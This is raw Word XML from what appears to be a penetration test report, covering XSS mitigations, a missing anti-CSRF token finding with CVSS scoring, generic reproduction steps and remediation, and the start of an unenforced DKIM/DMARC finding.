          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3D66727B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to block dangerous requests and common injection patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11EEDC88" w:rsidP="0D325B6E" w:rsidRDefault="11EEDC88" w14:paraId="39E6987E" w14:textId="1DB02B18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>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1EEDC88">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Utilize a strict Content Security Policy to restrict JavaScript sources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11EEDC88" w:rsidP="0D325B6E" w:rsidRDefault="11EEDC88" w14:paraId="201C1C22" w14:textId="331B7412">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>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1EEDC88">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mark session cookie configurations as </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="11EEDC88">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="11EEDC8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1EEDC88">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Secure</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="11EEDC88">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11EEDC88">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SameSite=Strict</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="11EEDC88">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to protect cookies from exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="653CE56B" w14:textId="1AD9908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6D42A52" w:rsidP="0D325B6E" w:rsidRDefault="26D42A52" w14:paraId="63559F49" w14:textId="2BA9F37B">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6D42A52">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028BB1F6" w:rsidP="0D325B6E" w:rsidRDefault="028BB1F6" w14:paraId="1907EB77" w14:textId="42387DC2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R025dc51ad0aa4d0c">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="028BB1F6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Mozilla - Secure Cookie Configurations</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="028BB1F6" w:rsidP="0D325B6E" w:rsidRDefault="028BB1F6" w14:paraId="01C068BE" w14:textId="0E171729">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Re1564666dfa443c1">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="028BB1F6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>OWASP - XSS Attacks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="717B1379" w:rsidP="0D325B6E" w:rsidRDefault="717B1379" w14:paraId="13524E13" w14:textId="41CBF6E6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R108d1b5127af461e">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="717B1379">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Portswigger - Cross Site Scripting Prevention</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6959DAE0" w14:textId="538422D3">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0DA75F6D" w14:textId="0704956D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4E2CD2B7" w14:textId="2B0861F8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0C41E978" w14:textId="1BD62213">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="397816EC" w14:textId="39DCFFA0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4704459B" w14:textId="2A7EC63B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="65CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="5D1AD9C7" w14:textId="7E70123A">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65CD89C4">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="92D050"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="65CD89C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L1: Lack of anti-CSRF Tokens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75"/>
        <w:gridCol w:w="4320"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="548B44E9">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9F77E68" w14:textId="6904C2E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7CB149" w14:textId="22BD23F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DB69325" w14:textId="6A5AB2F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7298B0B0">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442B5FB" w14:textId="1E4E6DE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3E0780A4" w14:textId="06049831">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59C0CDEE" w14:textId="6524C9D3">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5.1</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7C94C6E0" w14:textId="2AC4FB9A">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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="11E41570">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EB48174" w14:textId="00E4072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4F395DAE" w14:textId="310E8DB8">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Low</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1AE91911"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23E48CBA"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="30444EA7">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505ADE7" w14:textId="708AF96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5C83B48" w14:textId="6BEDDD69">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" r:id="Rdc75dae19b96417e">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="0409AF4C">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B46C240" w14:textId="7F1118A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5693FE4" w14:textId="7A1262DE">
            <w:pPr>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CBF0490" w14:textId="47485BA4">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Ra1281fbeb2c94b82">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1078: Valid Accounts</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2CC360DC" w14:textId="2916E33B">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R4f8ea6933fe54fe9">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1190: Exploit Public Facing Application</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="30E18209">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3E5645A1"/>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CB4A3F9" w14:textId="3A850AAF">
            <w:pPr>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0D27A8E" w14:textId="482AE75E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R1c5b064a9fc84a4c">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">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0D325B6E" w:rsidTr="0D325B6E" w14:paraId="23F51B2F">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B0DCAE7" w14:textId="223D4D9C">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3B499DC" w14:textId="1EBAEA7A">
            <w:pPr>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5A46B790" w14:textId="1837B8D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5CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="50F5B81F" w14:textId="1AF207F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5CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="1C1C51FC" w14:textId="5BEDBE1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The affected web applications do not implement CSRF protection. Without anti-CSRF tokens, an attacker can trick an authenticated victim to make unintended requests to the server. These requests can maliciously modify data, such as user passwords, in the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6FBD3E12" w14:textId="685BF0A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3161AD07" w14:textId="2729E0F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5CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="52174D9E" w14:textId="7F45643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If a privileged user is tricked by a threat actor into sending requests to the server to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critical data, the data integrity of APT’s network will be compromised.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7077101D">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Attackers can </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7077101D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>leverage</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7077101D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> this configuration to phish for other ATP clients and manipulate data to</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2CB3B62A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hijack </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2CB3B62A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>other</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2CB3B62A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> user account</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2CB3B62A">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2CB3B62A">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25B231B3" w14:textId="06E6982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4A16E7CB" w14:textId="2E246FF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5CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="48095B62" w14:textId="202AC96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D325B6E" w:rsidR="65CD89C4">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w:rsidR="65CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="6D00C73E" w14:textId="623407F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36764E35">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ntercept any post request that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modifies</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data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="65CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="67C5A742" w14:textId="1DAB2C3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Step 3: Observe that it does not use any CSRF token.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="712AA1AE" w14:textId="64324F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6EE1282F" w14:textId="314D739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5CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="16F8B563" w14:textId="15FE80E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5CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="7C9AEB0E" w14:textId="716AAE2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Implement anti-CSRF tokens, using unique and random tokens for every request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="65CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="61A7DFD9" w14:textId="5557EBE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Validate all anti-CSRF tokens on the server side before processing any request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="65CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="7A9377C6" w14:textId="1EC9971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65CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="24BF2E2C" w14:textId="2751DDF7">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0fe7c620f1cd4cd8">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="65CD89C4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP - Cross Site Request Forgery</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="520867EB" w14:textId="0DDDF87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354EEF0" w14:textId="464FB91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0BAA9DD" w14:textId="7CF0187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E6BF2CA" w14:textId="6656C1B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0D02D92" w14:textId="6225C42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39B357D1" w14:textId="09412D4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62D30DCE" w14:textId="4899D5A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564FBF9" w14:textId="63D0C49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6DD717E5" w14:textId="7700F8A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F572DCA" w14:textId="42BEFEB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035D9126" w14:textId="17E02B1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D743B89" w14:textId="6DF32B7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16A5CE47" w14:textId="7ADC420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27E717B4" w14:textId="5B41765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5B902BB9" w14:textId="1B46D8E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A776135" w14:textId="1B2DF15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3EB56B37" w14:textId="56073C62">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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RDefault="0D325B6E" w14:paraId="45B58D82" w14:textId="5D90DC46">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="65CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="7535C6AD" w14:textId="7DF2A99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65CD89C4">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="92D050"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="65CD89C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L1: SMTP </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5554027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Un</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="65CD89C4">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enforced DKIM and DMARC</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69"/>
        <w:gridCol w:w="1569"/>
        <w:gridCol w:w="2475"/>
        <w:gridCol w:w="4320"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4DD0DF8A">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E50873" w14:textId="0B526906">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6650B3" w14:textId="02E900A0">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BBF1895" w14:textId="5C084B14">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6D2BFFB">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>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E846E0" w14:textId="3857F134">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1E367E3D" w14:textId="48A32E5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46047C62" w14:textId="0861418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2.3</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0FC73146" w14:textId="523FE65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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
